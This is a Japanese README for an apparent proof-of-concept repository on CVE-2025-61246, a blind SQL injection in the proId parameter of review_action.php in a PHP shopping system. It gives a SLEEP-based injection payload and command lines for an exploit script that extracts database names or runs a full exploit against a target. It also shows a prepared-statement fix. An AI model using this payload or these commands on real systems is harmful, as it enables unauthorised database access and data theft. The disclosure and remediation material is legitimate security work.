
CVE-2025-61246: オンラインショッピングシステムPHPにおけるSQLインジェクション脆弱性のPoC
このリポジトリには、CVE-2025-61246 の概念実証(PoC)が含まれています。これは、オンラインショッピングシステムPHPアプリケーションで発見された重大なSQLインジェクション脆弱性です。この脆弱性により、認証されていない攻撃者が、時間ベースのブラインドSQLインジェクションを通じて任意のSQLコマンドを実行できる可能性があります。
/online-shopping-system-php-master/review_action.phpproIdこの脆弱性は、review_action.php エンドポイントに存在し、proId パラメータからのユーザー入力を適切なサニタイズやパラメータ化クエリなしにSQLクエリに直接組み込むことに起因します。これにより、攻撃者は悪意のあるSQLペイロードを注入でき、以下のことが可能になります:
// 脆弱なコード(例)
$proId = $_POST['proId'];
$query = "SELECT * FROM products WHERE id = " . $proId;
mysqli_query($conn, $query);
攻撃者は以下の手順でこの脆弱性を悪用できます:
/online-shopping-system-php-master/review_action.php に送信するproId パラメータに悪意のあるSQLペイロードを含めるproId=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -
このリポジトリには以下が含まれています:
exploit.py) - 脆弱性を検出および悪用するPythonスクリプトMANUAL_TESTING.md) - 手動による悪用の手順書docker-compose.yml) - 安全なテストのためのDocker環境REMEDIATION.md) - 安全なコーディングプラクティスとパッチPython 3.7+
pip install -r requirements.txt
# リポジトリのクローン
git clone https://github.com/hackergovind/CVE-2025-61246.git
cd CVE-2025-61246
# 依存関係のインストール
pip install -r requirements.txt
# エクスプロイトの実行
python exploit.py --url http://target.com/online-shopping-system-php-master/review_action.php
# 検出のみ(悪用なし)
python exploit.py --url http://target.com/review_action.php --detect-only
# データベース名の抽出
python exploit.py --url http://target.com/review_action.php --extract-db
# カスタムタイムアウトによる完全悪用
python exploit.py --url http://target.com/review_action.php --timeout 10 --full-exploit
# テスト用プロキシの使用
python exploit.py --url http://target.com/review_action.php --proxy http://127.0.0.1:8080
この脆弱性の悪用に成功すると、以下のような結果を招く可能性があります:
// プリペアドステートメントを使用した安全な実装
$proId = $_POST['proId'];
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
$stmt->bind_param("i", $proId);
$stmt->execute();
$result = $stmt->get_result();
詳細な修復手順については、REMEDIATION.md を参照してください。
⚠️ 重要: このPoCは教育目的および許可されたセキュリティテスト目的でのみ提供されています。コンピュータシステムへの不正アクセスは違法です。作成者は、この情報の誤用に対する一切の責任を負いません。テストを行う前に、必ず適切な許可を取得してください。
Govind Pratap Singh
このプロジェクトはMITライセンスの下でライセンスされています。詳細については、LICENSE ファイルを参照してください。
責任ある開示: セキュリティ脆弱性を発見した場合は、公開前に責任を持ってベンダーに報告してください。